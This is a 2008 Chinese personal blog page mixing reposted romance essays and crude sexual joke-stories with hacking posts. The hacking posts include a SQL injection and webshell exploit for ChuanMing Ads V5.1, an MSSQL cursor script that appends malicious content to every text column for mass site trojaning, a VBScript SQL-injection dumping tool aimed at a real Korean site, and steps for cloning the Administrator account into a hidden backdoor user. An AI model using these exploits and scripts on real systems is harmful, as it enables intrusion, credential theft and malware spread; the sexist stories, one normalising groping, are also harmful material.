六翼酒吧

文章列表

2008年09月26日星期五下午 08:01

ChuanMing Ads (广告联盟)V5.1 Access正式版
version :V5.1 Access正式版
Author :seraph
From :http://hi.baidu.com/seraph1221
File : inc/inc.asp

漏洞出现在一个过滤函数
Function ReplaceBadChar(strChar)
    If strChar = "" Or IsNull(strChar) Then
        ReplaceBadChar = ""
        Exit Function
    End If
    Dim strBadChar, arrBadChar, tempChar, i
    strBadChar = "',%,^,&,?,(,),<,>,[,],{,},/,\,;,:," & Chr(34) & "," &

Chr(0) & ""
    arrBadChar = Split(strBadChar, ",")
    tempChar = strChar
    For i = 0 To UBound(arrBadChar)
        tempChar = Replace(tempChar, arrBadChar(i), "")
    Next
    ReplaceBadChar = tempChar
End Function

过滤了大部分符号，不过没过滤* ，（逗号）随便找一个数字型的地方就可以注

入
http://127.0.0.1/other/news.asp?action=news&id=2
action=news&id=2%20union%20select%201,name,pwd,4%20from%20cm_admin
得到管理员用户名密码

admin/admin_setting.asp
设置网站参数，把参数放在inc/config.asp里面，修改参数的时候没有过滤引号
直接修改某个参数后面加":eval request("#"):aa=" (内容包含引号)就可以得

到WEBSHELL

类别：〓六度空间〓原创 | 评论(0) | 浏览()

男人的爱只有一次----女孩你珍惜了吗？

2008年09月13日星期六上午 06:33

人们长说痴男怨女，古人已经解释的很清楚了，痴男，男人对爱的痴情，对感情的专一也只有男人自己才知道。女人一辈子可爱上多个男人,而男人却可以同时爱上多个女人,可女人却不知道其实男人一辈子只爱过一个! 男人真正纯洁的爱只有一次的，当那次爱来了，他会不顾一切，当那次爱死了，也就不会再有了，那次爱的太深,然而痛的也太深。所以那次之后男人的爱也就麻木了.男人以后也会爱上别的女孩,只是那种爱却已不再纯洁,包含了欲望,包含了同情,包含了怜惜~~~~~ 女人的心都是水做的,然而最毒也妇人心,所以受伤最多的是女人,伤人最深的也是女人。女人的爱可以有很多次,而男人却永远只有一次的,男人遇到那个最爱的女孩之后把所有的爱都给了她,可有多少女孩懂的珍惜。于是男人哭了,男人流泪了,伤心至极而绝望的泪水,慢慢的男人开始亲手去埋葬自己那唯一的爱,把它尘封在自己心底最深处的某个深渊。可当夜深人静的时候,他会疯狂的跳进那个深渊,妄图去寻找那次爱的痕迹,哪怕是一丝丝一点点,可结果却跟以往一样的一无所获,只留下自己独自缩在黑暗的角落孤独的一根根抽着寂寞的烟,孤独的流着伤心的泪水。当然女人埋怨着男人的花心的时候是否曾想过,男人最珍贵的东西也正是被你们无情的毁灭,当男人羞涩的说着我爱你的时候你珍惜了吗?当男人为你流泪的时候你帮他擦拭了吗?当男人乞求你别离开的时候你回头了吗? 都说男人花心,可女人何曾知道,男人的花心是因为痴心,爱极而痴,痴极而痛,痛极而死.这次爱灰飞烟灭后男人对爱的心就死了,男人再也不会对女人真心的付出真正的好了,没有了心劲,没有了激情,不再相信真正的爱情,对爱总带着点玩世不恭,有些事,一辈子只有一次。当男人全心爱过一个人之后,该付出的付出了,全心努力的去把握过,曾试图给她想要的一切,曾试图为她而死,但回报却是无动于衷,于是在一次次寂寞的等待中, 心血一点一滴的滴干了,最后心血全无,心灰意冷,当爱情失去信仰,当感情失去忠一的港湾后,对于男人来说,爱情是什么这一切就都显的无所谓了!男人的心冷了,就再也难以热起来,因为爱过一次之后已经让他失去了爱的能力。男人最爱的真的只有一个,男人心里最清楚,如果你是你能感觉到的吗,感觉到了,请你珍惜好吗 ?

类别：〓经典转载〓 | 评论(2) | 浏览()

以下有九个故事，教你如何更快的找到另一半。要看完哦。。。

2008年09月13日星期六上午 05:42

一] 蛇与乌龟的故事
　　一条大蟒蛇和一条小毒蛇是朋友。
　　这天他们在路边发现了一只巨大的乌龟。
　　蛇兄弟想，这么大的个儿，可是一顿美餐啊。
　　蟒蛇说：我来对付他。
　　于是蟒蛇施展自己的绝技，用身体将大乌龟牢牢地缠住。而大乌龟早已将身体缩进了壳里，任凭蟒蛇怎么缠绕，也无法伤害到大乌龟。
　　泄气的蟒蛇，气喘吁吁地爬到了一边。
　　大乌龟谨慎地露出脑袋，在他露出脑袋的那一瞬间，小毒蛇闪电般地在乌龟脑袋上咬了一口，大乌龟又急忙缩回壳中。但是几分钟后，大乌龟因为中毒而死了。
蟒蛇说：哇！我花了那么大力气也没能伤害乌龟，你却轻而易举地办到了啊。
小毒蛇说：因为我了解他的要害。
　　可是接下来的还是有一个问题，大乌龟死后依然缩在壳里，两条蛇都是吞食性的动物，而他们又无法脱下乌龟的外壳，只好怏怏地离开了……

　　这个故事告诉我们：即使你擅长死缠烂打，也未必能泡到那个妞，要了解那个妞才可以。
这个故事还告诉我们：如果你无法脱下那个妞的衣服，就不要再花力气去泡她了。

[二] 一只公寄居蟹找到了一只很大的空贝壳，便把贝壳清理干净，做成了自己的房子。
　　有了房子的公寄居蟹很快找到了一只母寄居蟹，他们快乐地生活在这个大房子里。
　　每天他们出门，母寄居蟹就自由快乐地遨游，觅食，而公寄居蟹背着沉重的房子艰难地跟在母寄居蟹身后。母寄居蟹游一段路就要停下来等公蟹。
　　这样的生活过了没多久，有一天母寄居蟹跟着一只无拘无束的龙虾一起游走了，再也没有回来，而公寄居蟹无法丢下他沉重的房子，只能眼睁睁地看着母寄居蟹游远、游远、游远，渐渐消失，不见……

这个故事告诉我们：如果你有一所房子，那你泡妞的难度将降低。
　　这个故事还告诉我们：如果你的房子成为了你的重负，那么你以后的生活将变得痛苦不堪。所以在决定是否分期买房的时候请先衡量一下得与失。

[三] 一条不懂事的美丽小蛇在水边看见了一只有着漂亮花纹、皮肤超好的青蛙，不禁生出了爱慕之心。
　　小蛇对青蛙说：我们可以交往吗？
　　青蛙说：好啊好啊。
　　于是他们两个生活在了一起。
　　有一天，他们在睡觉的时候，小蛇在睡梦中不由自主地用身体将青蛙缠了起来，青蛙感觉要窒息了，就奋力挣扎，用两条强壮而有力的后腿重重地蹬在小蛇的腹部，弹了出去，然后迅速地逃走了，再也没有回来。
　　伤心的小蛇养好了身上的伤，却无法养好心中的伤，她对帅气漂亮的青蛙产生了恐惧感，认为会被伤害，从此她过着单身生活。
　　这一天，一只丑陋的癞蛤蟆发现了小蛇，觉得她十分美丽，不禁生出了爱慕之心。
　　癞蛤蟆对小蛇说：我们可以交往吗？
　　小蛇看了看丑陋的癞蛤蟆，觉得他的眼神很真诚，她那颗寂寞的心动摇了，她想这只癞蛤蟆这么丑陋，应该会好好珍惜她这么漂亮的小蛇的，于是她说：好吧好吧。
　　于是他们两个生活在了一起。
　　有一天，他们在睡觉的时候，小蛇在睡梦中不由自主地用身体将癞蛤蟆缠了起来，癞蛤蟆感觉要窒息了，就奋力挣扎，他的背上喷出了毒汁，射进了小蛇的眼睛，小蛇受痛展开了身体，癞蛤蟆趁机逃走了，再也没有回来。

　　这个故事告诉我们：别以为只有帅哥才会伤害女孩，丑男一样会伤害女孩，那么美丽的女孩你为何不去选择帅哥呢？
　　这个故事还告诉我们：适当的缠绵是可以的，但是如果你的性要求太频繁，给男人压力太大，那么男人会被你吓跑的。

[四] 一只美丽的天鹅有一天落在地上时，看见了一只健壮的鸭子，她立刻被这只帅气的鸭子所打动，她惊诧于鸭子不同于她同类的模样，不同于她同类气质，是那么的有型，那么的另类。
　　于是，天鹅向鸭子表明了爱意。受宠若惊的鸭子立刻接受了这份爱。
　　从此，天鹅与鸭子在土地上生活着，在泥塘边生活着。
　　天鹅那高贵而雪白的羽毛一天天被污脏了；天鹅那以前不会长期行走的美丽小脚红肿了；天鹅失去了云彩的抚摩，蓝天的洗涤。
　　天鹅终于忍不住了，她总是在说：鸭子，鸭子，你学习飞翔啊，那我们就可以一起在高空中比翼双飞了。
　　鸭子为了天鹅而努力学习飞翔，可惜他只是一只鸭子，想要飞翔，想要飞到和天鹅飞翔一样的高度实在是太难了，他实在是没有毅力了，于是他放弃了。
　　鸭子说：天鹅，你抓住我，带我去飞吧。
　　天鹅抓住鸭子，扇动翅膀，非常非常吃力地飞上了蓝天，在天上飞了一会儿就落地了。
　　鸭子笑了，鸭子觉得天上风景太美了，鸭子想爱上了天鹅真是好。
　　在那之后的日子里，鸭子每天都要求天鹅带他飞上天，而且要求飞翔的时间也越来越长，如果天鹅不能达到要求他就会生气。
　　疲惫的天鹅因为爱着鸭子，虽然身心俱疲，却依然会答应鸭子的要求。
　　这一天，鸭子又让天鹅带他去飞上蓝天，天鹅勉强抓住鸭子飞上了，飞得很高，很高，很高，然后天鹅低下头深深地吻了鸭子，就在鸭子感觉诧异的时候，天鹅松开了抓住鸭子的手……

　　这个故事告诉我们：做人要懂得知足，美女愿意让你上就很好了，千万不要要求太高，不要“天天想上”！
　　这个故事还告诉我们：公主爱上穷小子的故事并非没有，只是结局未必会那么完美。无论如何，阶级总是存在的，门当户对未必就是坏观念。攀上一个富家女确实会令你生活质量提高，但并不代表你可以免于奋斗。富家女会让你飞得很高，但也会让你死得很惨。

[五] 某公司新来了一位女同事，是位美艳少妇。是从公司的分部调来的，分部和公司总部是在两个城市，但是互相之间会有一些来往。
　　从分部其他同事处了解到，这个美少妇已经离异，且生活比较放纵，跟很多男人都有暧昧关系。于是公司的两个男人便生出了上她的想法----男人A和男人B。
　　男人A每天等到美少妇下班，故意和她一起乘坐电梯，然后趁机偷偷地碰一下美少妇的屁股，或者碰一下美少妇的胸部，或者顶一下美少妇屁股。男人A想这样来勾引美少妇，以达到上她的目的。　　可是，美少妇要么装着不知道，要么就的对他怒目而视，最终男人A放弃了。
　　男人B了解到美少妇之所以离婚是因为她的男人太软弱，她喜欢强势的男人。有一天在电梯里，他粗鲁地堵住美少妇，很直接地说道：我想和你一夜情。美少妇惊讶地张大了嘴巴，片刻又恢复正常，她答应了男人B。男人B从此便成为了美少妇的府上常客。
　　这个故事告诉我们：机会永远只留给有准备的人，有准备才能及时正确地抓住机会。
　　这个故事还告诉我们：男人好色并不是什么可耻的事，真正令人无法忍受的是猥琐！想上就上要上得精彩！千万不要猥琐又变态。

[六] 这个故事发生在古代。
　　说有一个秀才在酒楼吃饭，见到一个妓女，便心生淫念，欲上之。
　　于是，秀才冲妓女叫道：为妓者过来！
　　妓女听不懂他说的“为妓者”是什么意思，但是听懂了“过来”二字，就走到秀才身边。
　　秀才又说：其价几何？
　　妓女只听懂了一个“价”字，便告诉他做一次的价格。
　　秀才接着说：汝发黄矣，躯干色竭，请损其价。
　　妓女骂了一句：损你老母！转身便走了。
　　这个故事告诉我们：别以为有文化就了不起，一样会被别人藐视。
　　这个故事还告诉我们：男人好色并不可耻，可耻的是那些装逼的人！

[七] 一只小象出门旅行，在路上碰到了同样旅行的小猪。
　　小象看着小猪，忍不住哈哈大笑着说：你的鼻子那么短，真是太好笑了，太差劲了，哈哈。
　　小猪反驳道：笑个P啊，你鼻子那么长，就象脸上长个J8似的，还笑呢。
　　两个小家伙互相嘲笑着前行，继续他们的旅行路程。
　　他们来到了一颗苹果树前，又红又大的苹果挂满了树冠膨大的苹果树。两只小家伙不禁口水横流，垂涎三尺。
　　小象来到树下，用他的长鼻子轻松地将苹果击落下来。于是两只小家伙开开心心地吃起来。
　　小猪边吃边说：原来你的鼻子也不是那么讨厌嘛，嘿嘿。
　　吃完苹果，他们继续前行。
　　走着走着，他们来到了一块番薯地。
　　小猪说：看我的。
　　说完，小猪用他的鼻子去拱地，拱啊拱啊，把埋在地下的番薯都拱了出来。于是两只小家伙开开心心地吃起来。
　　小象边吃边说：原来你的鼻子也不是那么差劲嘛，哈哈。

　　这个故事告诉我们：不要总以为自己的才是最好的，不要总看到别人的缺点，要学会看到别人的优点，取长补短，学为己用。
　　这个故事还告诉我们：不要以为长的就是好的，有时候短的也不错哦。长的有充实感，短的有灵活性，各有各的好嘛。

[八] 这一天，曹先生和曹太太在露天餐厅吃饭。
　　饭中，曹先生去上洗手间，饭桌前只剩下曹太太一人。
　　这时，一个衣着邋遢，蓬头垢面的男子突然坐到了曹太太的对面，冲着曹太太傻笑，并说道：美女，我要和你干一晚上，嘿嘿。
　　曹太太又惊又怒，骂道：滚开，你这个臭流氓，神经病！
　　邋遢男子依然笑眯眯地说：美女，和我干一晚上吧，嘿嘿。
　　曹太太大叫起来，曹先生急忙从洗手间赶了回来，看见邋遢男子也吃了一惊，冲上前就要动粗。
　　此时，邋遢男子笑嘻嘻地说道：我刚赢了大奖，我想花一百万和这个美女干一晚上，嘿嘿。
　　曹先生一听，愤怒的脸变了几下，最终变成了笑容，他柔声道：一百万啊，不知道先生是想在宾馆干还是在我家干呢？
　　此时的曹太太也脸色大变，一脸媚态地说：不知道先生是喜欢男上女下式，还是男下女上式呢？
　　刚说完，就看见一辆白车急刹车停在了他们旁边，车上冲出几个白大褂的男人将邋遢男子绑上车，就那么走了，只留下一脸错愕的曹先生、曹太太和邻桌满脸鄙夷的食客们。

　　这个故事告诉我们：人不可貌相，海水不可斗量。
　　这个故事还告诉我们：在利益的诱惑面前，如果要付出代价，一定要先确定自己会得到利益，再去考虑该不该付出代价。

[九] 某公司的一个男??会亲近她，希望能和她发生关系。
　　男职员绞尽脑汁地想啊想，终于他想了一个办法：公司的地下室是存放一些办公用品的地方，几乎很少人会进去，而且隔音效果很好……
　　这一天公司里仅有男职员和美女以及其他几个人在加班，男职员想机会来了。
　　男职员以请美女帮忙一起到地下室拿一些办公用品为由，带着美女来到了地下室。
　　进了地下室后，男职员趁美女没注意把门给锁上了，然后大叫：糟糕！
　　美女问怎么了？
　　男职员说：这门被锁上了，从里面要有钥匙才能开，我钥匙忘记带了，真是糟糕啊。
　　美女说：啊！那怎么办啊？我们出不去啦。
　　男职员不停地安慰美女，安慰着安慰着，两个人就搂抱在了一起，然后，两个人干柴烈火似的干了起来……
一番云雨后，二人穿戴整齐。
　　男人点了根烟，心满意足地抽着，为自己的聪明计策洋洋得意。
　　这时候，美女说话了：你还不错，比我之前想象的要棒。另外，告诉你，我和姐妹们打赌能不能吊上你，我赢了，哈哈。
　　说完，美女从衣服里掏出钥匙，打开门，高跟鞋哒哒哒地走了。
　　留在地下室的男职员目瞪口呆，错楞在那里。

　　这个故事告诉我们：永远不要以为自己比别人聪明多少，在你从别人身上得到利益时，可能更多时候别人从你身上获得了更多的利益。
　　这个故事还告诉我们：不要以为只有男人才是好色的，其实女人也会好色

类别：〓经典转载〓 | 评论(0) | 浏览()

百度链接每个参数的含义

2008年05月08日星期四上午 06:26

        q1关键字
        q2加引号关键字
        q3 加括号关键字
        q4-关键字
        q5,0为不包含，1包含在title:()当中，2为包含在inurl:()当中
        q6包含在site:当中
        ct 0为在所有语言当中，1为在简体语言中，0为在繁体语言中
        rn每页显示数10-100
        lm按时间查询，0为无，1为每日，7为一周内，30为一月内，360为一年内
        ft查找文件类型

类别：默认分类 | 评论(0) | 浏览()

最近比较流行的数据库挂马

2008年04月26日星期六下午 06:56

seraph注:用数据库挂马一年多,都没这位大虾的方法精妙,~~~真是失败啊

来源http://xss.betaslife.com/blog/?p=14
以前说过的趋势挂马事件，MS这个挂马方法已经流行了很久，从去年就大规模开始了，在网上可以搜到很多痕迹。

SQL语句如下：

用游标遍历所有表里如下数据类型的字段，然后UPDATE挂马。（全部是允许写入字符的字段）

CODE:

[Copy to clipboard]

xtype=99 ntext

xtype=35 text

xtype=231 nvarchar

xtype=167 varchar

———————YD的分割——————————–

CODE:

[Copy to clipboard]

DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
Select
a.name,b.name
from sysobjects a,
syscolumns b
where a.id=b.id and
a.xtype=’u’ and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec(’update [’+@T+’] set [’+@C+’]=
rtrim(convert(varchar,[’+@C+’]))+
”挂马内容”’)
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

类别：〓经典转载〓 | 评论(1) | 浏览()

利用MSSQL访问并修改ACCESS数据库,需要SA权限

2008年04月24日星期四上午 07:14

两种方法,一种是通过sp_addlinkedserver链接服务器来对ACCESS进行操作

//添加链接
sp_addlinkedserver 'mytest2', 'Access 2000', 'Microsoft.Jet.OLEDB.4.0', 'e:\1.mdb'
修改数据
update mytest2...eWebEditor_System set sys_username='17a57a5a743894a0e'

利用OPENROWSET来对ACCESS进行查询或者修改

//查询
select * from OPENROWSET('Microsoft.Jet.OLEDB.4.0', ';database=e:\1.mdb', 'select * from eWebEditor_System' )

//修改
update OPENROWSET('Microsoft.Jet.OLEDB.4.0', ';database=e:\1.mdb', 'select * from eWebEditor_System' ) set sys_username='7a57a5a743894a0e'

两种方法都可以,需要的是SA或者SASCERITY的权限

类别：〓六度空间〓原创 | 评论(5) | 浏览()

Sql2005注射辅助脚本[粗糙版]

2008年04月23日星期三下午 07:09

Sql2005注射辅助脚本[粗糙版]

2008/04/14 13:09 copy from tr4c3

'***********************************************************************************************
'Sql2005注射辅助脚本[粗糙版] 用于mssql显错模式 By Tr4c3[at]126[Dot]com
'亦适用于MSSQL 2000的注射,不过2000还是用nbsi和Pangolin。
'***********************************************************************************************
'为了保持脚本的通用性，放弃了 and (select col_name(object_id('TableName'),N))=0这样的用法。
'欲返回韩文等字符可修改121或者136行，更多的设置要自己修改
'更多功能请大家自己加入

Const method = "Get" '提交方式请修改此处,有get和post可选
Const DisPlay = "D" 'S 保存到文件，D输出到屏幕

Dim strUrl_B, strUrl, i, k, MyArray, strArg, strD

strUrl_B = "http://onedu.mk.co.kr/02_process/cata1_2.asp?kwajung_code=120'" '基于注射点的不确定性，此处请手工更改
i = 1 '库的基数
k = 0 '表和字段的基数
MyArray = Split(strUrl_B, "?", -1, 1)
strUrl = MyArray(0) '取url
strArg = MyArray(1) '取参数
Set Args = Wscript.Arguments

If Args.Count = 0 Then
ShowU
End If
'If Args.Count =1 And LCase(Args(0))

'************************************************************************
'                              爆库
'************************************************************************
If Args.Count =1 Then
If LCase(Trim(Args(0)))="databases" Then
   ResuT("---------------===============================--------------")
   ResuT("All The DataBases:")

   Do
    strData = " and quotename(db_name("&i&"))=0--"
    sqlInj(strData)
    i = i + 1
   Loop Until StrD=""
   ResuT("---------------===============================--------------")
   Wscript.Quit
ElseIf LCase(Trim(Args(0)))= "info" then
   ResuT("---------------===============================--------------")
   ResuT("The Current Database is:")
   strData = " and quotename(db_name())=0--"
   sqlInj(strData)
   ResuT("---------------===============================--------------")
   ResuT("The database User is:")
   strData = " and quotename(user)=0--"
   sqlInj(strData)
   ResuT("---------------===============================--------------")
   ResuT("The System_user is:")
   strData = " and quotename(System_user)=0--"
   sqlInj(strData)
   ResuT("---------------===============================--------------")
   Wscript.Quit
End If
End If
'************************************************************************
'                              爆表
'************************************************************************
If Args.Count=2 And LCase(Trim(Args(1)))="tables" Then
ResuT("---------------===============================--------------")
ResuT("The Tables Of " & Args(0))
Do
   strData = " and (select top 1 quotename(name) from "& Args(0) & ".dbo.sysobjects where xtype=char(85) AND name not in (select top "& k &" name from "&Args(0)&".dbo.sysobjects where xtype=char(85)))=0--"
   sqlInj(strData)
   k = k + 1
Loop Until StrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
End If

'************************************************************************
'                             爆字段
'************************************************************************
If Args.Count=3 And LCase(Trim(Args(2)))="cols" Then
Database = Args(0)
Table = Args(1)
TarGet = DataBase & ".dbo." & Table
TarGetCol = Database & ".DBO.SYSCOLUMNS"
ResuT("---------------===============================--------------")
ResuT("The Columns Of " & TarGet)
Do
   strData = " and (select top 1 Quotename(name) from "& TarGetCol &" where id=object_id('"& TarGet &"') and name not in (select top "&k&" name from "& TarGetCol &" where id=object_id('"& TarGet &"')))=0--"
   sqlInj(strData)
   k = k + 1
Loop Until StrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
End If

'************************************************************************
'                              爆字段值
'************************************************************************
If Args.Count=4 And LCase(Trim(Args(3)))="values" Then
Database = Args(0)
Table = Args(1)
col = Args(2)
Target = Database & ".dbo." & Table
ResuT("---------------===============================--------------")
ResuT("The Values Of " & Args(2) & " in "&Target)
Do
   strData = " and (select top 1 quotename("& col &") from "& Target & " where "& col &" not in (select top "& k &" "& col &" from "& Target &"))=0--"
   sqlInj(strData)
   k = k + 1
Loop Until StrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
End If

Sub SqlInj(value)
If UCase(method) = "GET" Then
   value = strArg & value
   Set objXML = CreateObject("Microsoft.XMLHTTP")
   objXML.Open "GET", strUrl &"?" & value , False
   objXML.SetRequestHeader "Referer", strUrl
   'objXML.SetRequestHeader "Accept-Language", "EUC-KR"
   objXML.send()
   strRevS = objXML.ResponseText '默认用这个
   'strRevS = bytes2BSTR(objXML.ResponseBody) '韩文有时候要用这个
   If InStr(strRevS,"'[")<>0 And InStr(strRevs,"]'")<>0 Then
    strD = Mid(strRevS,InStr(strRevS,"'[")+2, InStr(strRevs,"]'") - Instr(strRevS,"'[")-2)
    ResuT(" |_"&strD)
   Else
    strD = ""
   End If
ElseIf UCase(method) = "POST" Then
   value = strArg & value
   Set objXML = CreateObject("Microsoft.XMLHTTP")
   objXML.Open "POST", strUrl, False
   objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
   objXML.SetRequestHeader "Referer", strUrl
   objXML.send(UrlEncode(value))
   strRevS = objXML.ResponseText '默认用这个
   'strRevS = bytes2BSTR(objXML.ResponseBody) '韩文有时候要用这个
   If InStr(strRevS,"'[")<>0 And InStr(strRevs,"]'")<>0 Then
    strD = Mid(strRevS,InStr(strRevS,"'[")+2, InStr(strRevs,"]'") - Instr(strRevS,"'[")-2)
    ResuT(" |_"&strD)
   Else
    strD = ""
   End If
End If
End Sub

Function ResuT(strInfo)
If UCase(DisPlay) = "S" Then
   Set fso = CreateObject("Scripting.FileSystemObject")
   Set fso1 = fso.OpenTextFile("result.txt",8,True)
   fso1.WriteLine(strInfo)
   fso1.Close
   Set fso = Nothing
ElseIf UCase(DisPlay) = "D" Then
   Wscript.Echo(strInfo)
End If
End Function

Function UrlEncode(str)
str = Replace(str," ","+")
UrlEncode = str
End Function

Function bytes2BSTR(vIn)
    strReturn = ""
    For i = 1 To LenB(vIn)
        ThisCharCode = AscB(MidB(vIn,i,1))
        If ThisCharCode < &H80 Then
            strReturn = strReturn & Chr(ThisCharCode)
        Else
            NextCharCode = AscB(MidB(vIn,i+1,1))
            strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
            i = i + 1
        End If
    Next
    bytes2BSTR = strReturn
End Function

Sub showU()
With Wscript
   .Echo("+--------------------------=====================------------------------------+")
   .Echo("Sql2005注射辅助脚本（粗糙版），用于mssql显错模式 By Tr4c3[at]126[Dot]com")
   .Echo("Usage:")
   .Echo(" cscript "&.ScriptName&" info--爆基本信息")
   .Echo(" cscript "&.ScriptName&" databases--爆所有库名")
   .Echo(" cscript "&.ScriptName&" pubs tables--爆库pubs里所有用户表名")
   .Echo(" cscript "&.ScriptName&" pubs authors cols--爆库pubs里authors表的所有字段名")
   .Echo(" cscript "&.ScriptName&" pubs authors au_id values--爆pubs.dbo.authors里au_id的值")
   .Echo("+--------------------------=====================------------------------------+")
   .Quit
End with
End Sub

类别：〓asp+mssql转载〓 | 评论(0) | 浏览()

哎,这个该死的程序

2008年04月23日星期三下午 04:54

两个星期没上来了,一直在忙着写一套注入方面的程序,搞得啥事都没去做,现在这套东西模块都完成了,却在组合方面出现了比较大的问题,主要都在线程上面,

哎,行百里者半九十啊,花了这么多时候不知道这个项目还应不应该继续下去

类别：〓乱七八遭〓杂谈 | 评论(1) | 浏览()

用FSO批量得到信息

2008年04月03日星期四上午 01:22

刚刚一个朋友让我帮他到一个网站上去找一些培训机构的电话和地址，然后再发给他，开始还以为只有一点点，就答应了

做完手头的事情，随手点开，不得了~~~满满一页的。。。~http://www.oatime.com/edu/shanghaishi/

不是要搞死我吧，~~~今天已经不是愚人节了啊。。。

没办法，开始想到的方法是用网站大挪移把这些页面下载下来，再一个页面一个页面的复制，可惜找了好久没找着，突然发现原来我机器上还有个flashget上次不是用他来检查过站点资源的嘛，嘿嘿用他来下载。

选到快车站点资源探索器，输入网页，哈哈，很快就检查到有哪些页面了~~~

批量下载下来~580个页面，很快，一会就下完了，下载的过程当中我就在想，我不会真的要去手工完成这个吧~~好像刚刚那个页面是静态生成的~~，直接批配搞定不就行了。~。。

说做就做，花了二十分钟写段ASP，如下，

<%
function first(path)
set fso=server.CreateObject("scripting.filesystemobject")
set objFolder=fso.GetFolder(path)
set objFiles=objFolder.Files
   for each objFile in objFiles
    filepath=path&objFile.name
    set filecontent = fso.OpenTextFile(filepath, 1, false)
    do while not filecontent.atendofstream
    fileline=filecontent.readline

    if instr(fileline,"<title>")>0 then
     fileline=replace(fileline,"<title>","")
     fileline=replace(fileline,"</title>","")
     response.write "<br><b>公司名称</b>:"&fileline
    end if
    if instr(fileline,"联系方式")>0 then
     response.write fileline&"<br>"
    end if
    loop

   next
set fso=nothing
end function
path="f:\1111\"
first(path)
%>

搞定，运行后，他要的东西都在上面了~~~闪人，~~

类别：〓六度空间〓原创 | 评论(5) | 浏览()

Win2003服务器下的完全克隆

2008年04月02日星期三上午 05:07

当登陆进3389以后--

先建立 cnlnfjhh$ 用户
c:\>net user cnlnfjhh$ wrsky /add
//后面加$ 是为了使在控制台下用 net user 看不到.

然后运行regedt32.exe(注意不是regedit.exe)
先找到HKEY_LOCAL_MAICHINE\SAM\SAM 点击它 ,然后在菜单"安全"->"权限" 添加自己现在登录的帐户或组,

把"权限"->"完全控制"->"允许"打上勾,然后确定.
这样就可以直接读取本地sam的信息

现在运行regedit.exe
打开键 HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\cnlnfjhh$
查看默认键值为"0x3f1" 相应导出如下
HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\cnlnfjhh$ 为cnlnfjhh$.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1 为 3f1.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 为 lf4.reg (Administrators的相应键)
用记事本打开lf4.reg 找到如下的"F"的值,比如这个例子中如下

"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\
00,00,00,00,00,00,00

把其复制后,打开3f1.reg,找到"F"的值,将其删除,然后把上面的那段粘贴.
打开cnlnfjhh$.reg,把里面的内容,比如这个例子中如下面这段复制

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\cnlnfjhh$]
@=hex(3f1):

回到3f1.reg 粘贴上面这段到文件最后,最后生成的文件内容如下
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1]
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\
00,00,00,00,00,00,00
"V"=hex:00,00,00,00,d4,00,00,00,02,00,01,00,d4,00,00,00,1a,00,00,00,00,00,00,\
00,f0,00,00,00,10,00,00,00,00,00,00,00,00,01,00,00,12,00,00,00,00,00,00,00,\
14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,\
01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,\
00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,\
00,00,00,00,00,00,00,00,00,14,01,00,00,15,00,00,00,a8,00,00,00,2c,01,00,00,\
08,00,00,00,01,00,00,00,34,01,00,00,14,00,00,00,00,00,00,00,48,01,00,00,14,\
00,00,00,00,00,00,00,5c,01,00,00,04,00,00,00,00,00,00,00,60,01,00,00,04,00,\
00,00,00,00,00,00,01,00,14,80,b4,00,00,00,c4,00,00,00,14,00,00,00,44,00,00,\
00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,\
00,00,00,00,02,c0,14,00,ff,07,0f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,\
00,70,00,04,00,00,00,00,00,14,00,1b,03,02,00,01,01,00,00,00,00,00,01,00,00,\
00,00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,\
00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,24,02,00,00,\
00,00,24,00,04,00,02,00,01,05,00,00,00,00,00,05,15,00,00,00,b4,b7,cd,22,dd,\
e8,e4,1c,be,04,3e,32,e8,03,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,\
00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,48,00,65,00,6c,00,70,\
00,41,00,73,00,73,00,69,00,73,00,74,00,61,00,6e,00,74,00,00,00,dc,8f,0b,7a,\
4c,68,62,97,a9,52,4b,62,10,5e,37,62,d0,63,9b,4f,dc,8f,0b,7a,4f,53,a9,52,84,\
76,10,5e,37,62,01,00,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,\
ff,ff,ff,88,d7,f1,01,02,00,00,07,00,00,00,01,00,01,00,db,57,a2,94,f8,41,63,\
